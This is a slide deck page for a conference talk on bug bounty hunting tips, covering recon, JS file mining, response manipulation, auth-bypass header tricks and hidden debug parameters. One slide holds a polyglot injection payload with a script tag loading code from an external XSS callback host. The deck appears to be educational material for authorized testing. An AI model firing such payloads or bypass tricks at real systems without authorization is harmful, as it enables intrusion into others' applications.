Uploaded byKhaledMohamed767546
PDF, PPTX481 views

BugBounty Tips.pdf

This document provides tips for bug bounty hunting. It discusses bug bounty platforms, reconnaissance techniques like subdomain enumeration and fuzzing, testing for hidden parameters, response manipulation, and automating tasks. Tips include using a VPS, saving BurpSuite files, checking JavaScript files for API calls, and searching online for similar reports and proof of concepts. References are provided for additional learning resources.

Embed presentation

Download as PDF, PPTX
Bug Bounty Hunting Tips By Ebrahem Hegazy
Root:~# whoami
Disclaimer I do not represent Visa and I’m presenting this session based on my personal knowledge and google search, fully.
Agenda • Bug Bounty intro • Bug Bounty Platforms • Bug Bounty Hunting Tips • References @athackcon | #atHackcon
Bug Bounty Into: When a company starts to offer rewards for security researchers to find vulnerabilities in their infrastructure and applications, under their rules, this is what is so called “Bug Bounty Program”.
Bug bounty platforms BugBounty.sa SynAck Hacken Hackerone BugCrowd Intigriti BUG BOUNTY PLATFORMS
Bug Bounty Hunting Tips • Create a list of all websites that do have a bug bounty program; • https://github.com/projectdiscovery/public-bugbounty- programs/blob/master/chaos-bugbounty-list.json • https://github.com/yesnet0/bounty/blob/master/programs-list.csv • use a VPS for all your enum/recon scripts • Enumerate subdomains of the subdomains • Always save the BurpSuite state/project files • Give time to reports quality, it always pays back
Bug Bounty Hunting Tips Yopmail.com
Bug Bounty Hunting Tips Response manipulation: • isAdmin: false • Roles • Prices • Authentication bypass – isAuthenticated: false → true • Or you can also try a generic false to true in the response body
Bug Bounty Hunting Tips Modify Nuclei templates or add your own templates i.e. Apache SSRF vulnerability, debug pages and so on. https://github.com/projectdiscovery/ nuclei-templates https://github.com/projectdiscovery/ nuclei- templates/blob/52f92b91a25a2672ff 5bed2e9bba1d9761f31099/exposures /logs/trace-axd-detect.yaml
Bug Bounty Hunting Tips Add many test cases to your testing payload to trigger multiple vulnz: ‘”()xx{9*9}xx${9*9}xx”>x<script src=https://something.xss.ht></script>
Bug Bounty Hunting Tips Always have a closer look at JS files. i.e. to fetch all API calls, or in case the application pages are hidden: echo http://target.com | gau | grep '.js$' | httpx -status-code -mc 200 - content-type | grep 'application/javascript’ Apikey Api_key Access_token bearer @yopmail.com @company.com @yahoo.com https://user:password@yahoo.com Api/
Bug Bounty Hunting Tips Automate your tasks using python Scripter plugin for BurpSuite: https://portswigger.net/bappstore/eb563ada801346e6bdb7a7d7c5c52 583 Example codes: https://github.com/lanmaster53/pyscripter-er/tree/master/snippets
Bug Bounty Hunting Tips Test for hidden Debug parameters for API endpoints: • debug=true • _debug=true Site.com/api/ConfigurationReport → Site.com/api/ConfigurationReport?debug=true
Bug Bounty Hunting Tips • Generate a list of all 1 to 4 chars files and add it to your file/dir bruteforce tool (i.e. using Crunch tool) • Append other wordlists to your dictionary: • https://github.com/Bo0oM/f uzz.txt/blob/master/fuzz.txt • Keep your db/dicc.txt up to date with all new stuff you find
Bug Bounty Hunting Tips Use Google dorks to find exploits, POC code and similar reports: • site:github.com exploit name poc • site:hackerone.com etc searching for vulnz and reports
Bug Bounty Hunting Tips if you found any corp or internal hostname with a login page, try to find the signup pages.
Bug Bounty Hunting Tips Always use weird headers in your testing such as the X-HTTP-Method- Override: PUT/GET/POST https://www.sec- down.com/InterestingGooglevulnerability3137reward..html When accessing an API, remove the authorization header and try XFF 127.0.0.1
Bug Bounty Hunting Tips if a subdomain returns forbidden or even not reachable, try to fuzz the subdomain with -tmp dev. test. qa. and so on (Pemburu) https://github.com/zigoo0/Pe mburu https://www.sec- down.com/Telekom.de%20Re mote%20Command%20Executi on!%20%7C%20Security%20Do wn!.html
References • https://twitter.com/hashtag/bugbountytips?src=hashtag_click • https://github.com/EdOverflow/bugbounty-cheatsheet • https://github.com/djadmin/awesome-bug-bounty • https://github.com/ngalongc/bug-bounty-reference • https://hackerone.com/hacktivity
Stay in touch • https://www.twitter.com/zigoo0 • https://www.sec-down.com • https://www.youtube.com/zigoo0

More Related Content

PDF
The-Power-Of-Recon (1)-poerfulo.pptx.pdf
bynezidsilva
 
PDF
Secure coding presentation Oct 3 2020
byMoataz Kamel
 
PDF
BugBounty Roadmap with Mohammed Adam
byMohammed Adam
 
PDF
Recon for Bug Bounty by Agnibha Dutta.pdf
bynull - The Open Security Community
 
PPTX
SSRF For Bug Bounties
byOWASP Nagpur
 
PDF
Frans Rosén Keynote at BSides Ahmedabad
bySecurity BSides Ahmedabad
 
PPTX
Web Hacking With Burp Suite 101
byZack Meyers
 
PDF
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
The-Power-Of-Recon (1)-poerfulo.pptx.pdf
bynezidsilva
 
Secure coding presentation Oct 3 2020
byMoataz Kamel
 
BugBounty Roadmap with Mohammed Adam
byMohammed Adam
 
Recon for Bug Bounty by Agnibha Dutta.pdf
bynull - The Open Security Community
 
SSRF For Bug Bounties
byOWASP Nagpur
 
Frans Rosén Keynote at BSides Ahmedabad
bySecurity BSides Ahmedabad
 
Web Hacking With Burp Suite 101
byZack Meyers
 
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 

What's hot

PPTX
Burp suite
bySOURABH DESHMUKH
 
PDF
OWASP API Security Top 10 - API World
by42Crunch
 
PPTX
Attacking thru HTTP Host header
bySergey Belov
 
PDF
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
PPTX
Waf bypassing Techniques
byAvinash Thapa
 
PDF
Hacking Adobe Experience Manager sites
byMikhail Egorov
 
PDF
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
byMario Heiderich
 
PPTX
Burpsuite 101
byn|u - The Open Security Community
 
PPTX
Metasploit
byInstitute of Information Security (IIS)
 
PPTX
Owasp Top 10 A1: Injection
byMichael Hendrickx
 
PDF
The top 10 windows logs event id's used v1.0
byMichael Gough
 
PDF
Securing AEM webapps by hacking them
byMikhail Egorov
 
PDF
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
PPTX
Bug Bounty for - Beginners
byHimanshu Kumar Das
 
PDF
Offzone | Another waf bypass
byДмитрий Бумов
 
PPTX
Recon like a pro
byNirmalthapa24
 
PDF
Pentesting Rest API's by :- Gaurang Bhatnagar
byOWASP Delhi
 
PDF
Introduction to GitHub Actions
byKnoldus Inc.
 
PDF
Finding attacks with these 6 events
byMichael Gough
 
PDF
HTTP Request Smuggling via higher HTTP versions
byneexemil
 
Burp suite
bySOURABH DESHMUKH
 
OWASP API Security Top 10 - API World
by42Crunch
 
Attacking thru HTTP Host header
bySergey Belov
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
Waf bypassing Techniques
byAvinash Thapa
 
Hacking Adobe Experience Manager sites
byMikhail Egorov
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
byMario Heiderich
 
Burpsuite 101
byn|u - The Open Security Community
 
Metasploit
byInstitute of Information Security (IIS)
 
Owasp Top 10 A1: Injection
byMichael Hendrickx
 
The top 10 windows logs event id's used v1.0
byMichael Gough
 
Securing AEM webapps by hacking them
byMikhail Egorov
 
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
Bug Bounty for - Beginners
byHimanshu Kumar Das
 
Offzone | Another waf bypass
byДмитрий Бумов
 
Recon like a pro
byNirmalthapa24
 
Pentesting Rest API's by :- Gaurang Bhatnagar
byOWASP Delhi
 
Introduction to GitHub Actions
byKnoldus Inc.
 
Finding attacks with these 6 events
byMichael Gough
 
HTTP Request Smuggling via higher HTTP versions
byneexemil
 

Similar to BugBounty Tips.pdf

PPTX
Basics of getting Into Bug Bounty Hunting
byMuhammad Khizer Javed
 
PPTX
Bug bounties - cén scéal?
byCiaran McNally
 
PDF
Bug Bounty Career.pdf
byVishal318796
 
PDF
Bug Bounty Guide Tools and Resource.pdf
byhacktube5
 
PPTX
Web Application Security And Getting Into Bug Bounties
bykunwaratul hax0r
 
PPTX
Getting_Started_with_Bug_Bounty program.
byglcrushgaming
 
PDF
Fun & profit with bug bounties
byn|u - The Open Security Community
 
PDF
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
byAbhinav Mishra
 
PPTX
bug_bountybug_bountybug_bountybug_bounty.pptx
byFutureTechnologies3
 
PPTX
Nbt con december-2014-slides
byBehrouz Sadeghipour
 
PPTX
Nbt con december-2014-slides
byBehrouz Sadeghipour
 
PPTX
Crypto Night at CSUS - Bug Bounties
byBehrouz Sadeghipour
 
PPTX
Bug Bounty - Play For Money
byShubham Gupta
 
PDF
Yet another talk on bug bounty
byvinoth kumar
 
PPTX
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
byAvi Sharma
 
PDF
Bug Bounty for Blockchain Projects by Evgenia Broshevan, Project Lead at Hack...
byHackenProof
 
PDF
Owasp LA
byleifdreizler
 
PDF
Bug Bounty Blueprint : A Beginner's Guide
byVarun Mithran
 
PPTX
HI THIS IS URGENT PLZ FIX ASAP: Critical Vunlerabilities and Bug Bounty Programs
bybugcrowd
 
PPTX
Saying Hello to Bug Bounty
byNull Bhubaneswar
 
Basics of getting Into Bug Bounty Hunting
byMuhammad Khizer Javed
 
Bug bounties - cén scéal?
byCiaran McNally
 
Bug Bounty Career.pdf
byVishal318796
 
Bug Bounty Guide Tools and Resource.pdf
byhacktube5
 
Web Application Security And Getting Into Bug Bounties
bykunwaratul hax0r
 
Getting_Started_with_Bug_Bounty program.
byglcrushgaming
 
Fun & profit with bug bounties
byn|u - The Open Security Community
 
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
byAbhinav Mishra
 
bug_bountybug_bountybug_bountybug_bounty.pptx
byFutureTechnologies3
 
Nbt con december-2014-slides
byBehrouz Sadeghipour
 
Nbt con december-2014-slides
byBehrouz Sadeghipour
 
Crypto Night at CSUS - Bug Bounties
byBehrouz Sadeghipour
 
Bug Bounty - Play For Money
byShubham Gupta
 
Yet another talk on bug bounty
byvinoth kumar
 
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
byAvi Sharma
 
Bug Bounty for Blockchain Projects by Evgenia Broshevan, Project Lead at Hack...
byHackenProof
 
Owasp LA
byleifdreizler
 
Bug Bounty Blueprint : A Beginner's Guide
byVarun Mithran
 
HI THIS IS URGENT PLZ FIX ASAP: Critical Vunlerabilities and Bug Bounty Programs
bybugcrowd
 
Saying Hello to Bug Bounty
byNull Bhubaneswar
 

Recently uploaded

PPTX
Cardiovascular System or The Details of Heart.pptx
byAshish Umale
 
PDF
• Reinforcing the Human Firewall: Moving From Awareness to Applied Skill
byAdityarajsinh Gohil
 
PPTX
AI Literacy at UCD Library. Dr Marta Bustillo & Sandra Dunkin, University Col...
byCONUL Conference
 
PDF
Behind the Studioz Report by LDMMIA 2026
by©LDMMIA, ©Reiki Yoga
 
PPTX
English 8 Q3 Wk6.pptx prewriting opinion editorial article
byjacquelyncastre03
 
PPTX
From Vision to Action: UCC Library’s Digital & Information Literacy Framework...
byCONUL Conference
 
PPTX
From AI curious to AI conversant – a year of experimentation at TCD Library. ...
byCONUL Conference
 
PDF
BÀI TẬP BỔ TRỢ 4 KỸ NĂNG TIẾNG ANH 9 GLOBAL SUCCESS - CẢ NĂM - BÁM SÁT FORM Đ...
byNguyen Thanh Tu Collection
 
PPTX
What’s a Milestone in a Sales Order in Odoo 18
byCeline George
 
PPTX
Bookish Bats: a unique sustainable delivery service in the Russell Library. A...
byCONUL Conference
 
PPTX
Spherocytosis_Heridetary Spherocytosis_ AIHA_Dr Dibyajyoti Prusty, MD.pptx
byDibyajyoti Prusty
 
PDF
Result Analysis of the Pre Board 2025 .pdf
byDirectorate of Education Delhi
 
PPTX
Well on our way – Rolling out a wellbeing programme at the Radcliffe Science ...
byCONUL Conference
 
PPTX
Pharmaceutical organic chemistry II :unit V - Cycloalkanes
byPOOJA KARVANDE
 
PPTX
Conduction System of the Heart, The Cardiac Cycle, The Cardiac Output, ECG.pptx
byAshish Umale
 
PPTX
605456209-week-6-ppt-pagbasa.pptxpowerpointpresentation
byDecerrieMerabite
 
PPTX
Non aqueous titration First Year B. Pharm.pptx
byMs. Ashatai Patil
 
PDF
Old Historicism vs New Historicism Slides
byDr. Ilyas Babar Awan
 
PPTX
Digital Equity and inclusivity: Librarians connecting the unconnected rural ...
byCONUL Conference
 
PDF
India Cybercrime Threats & Response 2025: Digital Arrests, 1930 Helpline & Ze...
bySanjay Rathod
 
Cardiovascular System or The Details of Heart.pptx
byAshish Umale
 
• Reinforcing the Human Firewall: Moving From Awareness to Applied Skill
byAdityarajsinh Gohil
 
AI Literacy at UCD Library. Dr Marta Bustillo & Sandra Dunkin, University Col...
byCONUL Conference
 
Behind the Studioz Report by LDMMIA 2026
by©LDMMIA, ©Reiki Yoga
 
English 8 Q3 Wk6.pptx prewriting opinion editorial article
byjacquelyncastre03
 
From Vision to Action: UCC Library’s Digital & Information Literacy Framework...
byCONUL Conference
 
From AI curious to AI conversant – a year of experimentation at TCD Library. ...
byCONUL Conference
 
BÀI TẬP BỔ TRỢ 4 KỸ NĂNG TIẾNG ANH 9 GLOBAL SUCCESS - CẢ NĂM - BÁM SÁT FORM Đ...
byNguyen Thanh Tu Collection
 
What’s a Milestone in a Sales Order in Odoo 18
byCeline George
 
Bookish Bats: a unique sustainable delivery service in the Russell Library. A...
byCONUL Conference
 
Spherocytosis_Heridetary Spherocytosis_ AIHA_Dr Dibyajyoti Prusty, MD.pptx
byDibyajyoti Prusty
 
Result Analysis of the Pre Board 2025 .pdf
byDirectorate of Education Delhi
 
Well on our way – Rolling out a wellbeing programme at the Radcliffe Science ...
byCONUL Conference
 
Pharmaceutical organic chemistry II :unit V - Cycloalkanes
byPOOJA KARVANDE
 
Conduction System of the Heart, The Cardiac Cycle, The Cardiac Output, ECG.pptx
byAshish Umale
 
605456209-week-6-ppt-pagbasa.pptxpowerpointpresentation
byDecerrieMerabite
 
Non aqueous titration First Year B. Pharm.pptx
byMs. Ashatai Patil
 
Old Historicism vs New Historicism Slides
byDr. Ilyas Babar Awan
 
Digital Equity and inclusivity: Librarians connecting the unconnected rural ...
byCONUL Conference
 
India Cybercrime Threats & Response 2025: Digital Arrests, 1930 Helpline & Ze...
bySanjay Rathod
 

BugBounty Tips.pdf

  • 1.
  • 2.
  • 3.
    Disclaimer I do notrepresent Visa and I’m presenting this session based on my personal knowledge and google search, fully.
  • 4.
    Agenda • Bug Bountyintro • Bug Bounty Platforms • Bug Bounty Hunting Tips • References @athackcon | #atHackcon
  • 5.
    Bug Bounty Into: Whena company starts to offer rewards for security researchers to find vulnerabilities in their infrastructure and applications, under their rules, this is what is so called “Bug Bounty Program”.
  • 6.
  • 7.
    Bug Bounty HuntingTips • Create a list of all websites that do have a bug bounty program; • https://github.com/projectdiscovery/public-bugbounty- programs/blob/master/chaos-bugbounty-list.json • https://github.com/yesnet0/bounty/blob/master/programs-list.csv • use a VPS for all your enum/recon scripts • Enumerate subdomains of the subdomains • Always save the BurpSuite state/project files • Give time to reports quality, it always pays back
  • 8.
    Bug Bounty HuntingTips Yopmail.com
  • 9.
    Bug Bounty HuntingTips Response manipulation: • isAdmin: false • Roles • Prices • Authentication bypass – isAuthenticated: false → true • Or you can also try a generic false to true in the response body
  • 10.
    Bug Bounty HuntingTips Modify Nuclei templates or add your own templates i.e. Apache SSRF vulnerability, debug pages and so on. https://github.com/projectdiscovery/ nuclei-templates https://github.com/projectdiscovery/ nuclei- templates/blob/52f92b91a25a2672ff 5bed2e9bba1d9761f31099/exposures /logs/trace-axd-detect.yaml
  • 11.
    Bug Bounty HuntingTips Add many test cases to your testing payload to trigger multiple vulnz: ‘”()xx{9*9}xx${9*9}xx”>x<script src=https://something.xss.ht></script>
  • 12.
    Bug Bounty HuntingTips Always have a closer look at JS files. i.e. to fetch all API calls, or in case the application pages are hidden: echo http://target.com | gau | grep '.js$' | httpx -status-code -mc 200 - content-type | grep 'application/javascript’ Apikey Api_key Access_token bearer @yopmail.com @company.com @yahoo.com https://user:password@yahoo.com Api/
  • 13.
    Bug Bounty HuntingTips Automate your tasks using python Scripter plugin for BurpSuite: https://portswigger.net/bappstore/eb563ada801346e6bdb7a7d7c5c52 583 Example codes: https://github.com/lanmaster53/pyscripter-er/tree/master/snippets
  • 14.
    Bug Bounty HuntingTips Test for hidden Debug parameters for API endpoints: • debug=true • _debug=true Site.com/api/ConfigurationReport → Site.com/api/ConfigurationReport?debug=true
  • 15.
    Bug Bounty Hunting Tips •Generate a list of all 1 to 4 chars files and add it to your file/dir bruteforce tool (i.e. using Crunch tool) • Append other wordlists to your dictionary: • https://github.com/Bo0oM/f uzz.txt/blob/master/fuzz.txt • Keep your db/dicc.txt up to date with all new stuff you find
  • 16.
    Bug Bounty HuntingTips Use Google dorks to find exploits, POC code and similar reports: • site:github.com exploit name poc • site:hackerone.com etc searching for vulnz and reports
  • 17.
    Bug Bounty HuntingTips if you found any corp or internal hostname with a login page, try to find the signup pages.
  • 18.
    Bug Bounty HuntingTips Always use weird headers in your testing such as the X-HTTP-Method- Override: PUT/GET/POST https://www.sec- down.com/InterestingGooglevulnerability3137reward..html When accessing an API, remove the authorization header and try XFF 127.0.0.1
  • 19.
    Bug Bounty Hunting Tips ifa subdomain returns forbidden or even not reachable, try to fuzz the subdomain with -tmp dev. test. qa. and so on (Pemburu) https://github.com/zigoo0/Pe mburu https://www.sec- down.com/Telekom.de%20Re mote%20Command%20Executi on!%20%7C%20Security%20Do wn!.html
  • 20.
    References • https://twitter.com/hashtag/bugbountytips?src=hashtag_click • https://github.com/EdOverflow/bugbounty-cheatsheet •https://github.com/djadmin/awesome-bug-bounty • https://github.com/ngalongc/bug-bounty-reference • https://hackerone.com/hacktivity
  • 21.
    Stay in touch •https://www.twitter.com/zigoo0 • https://www.sec-down.com • https://www.youtube.com/zigoo0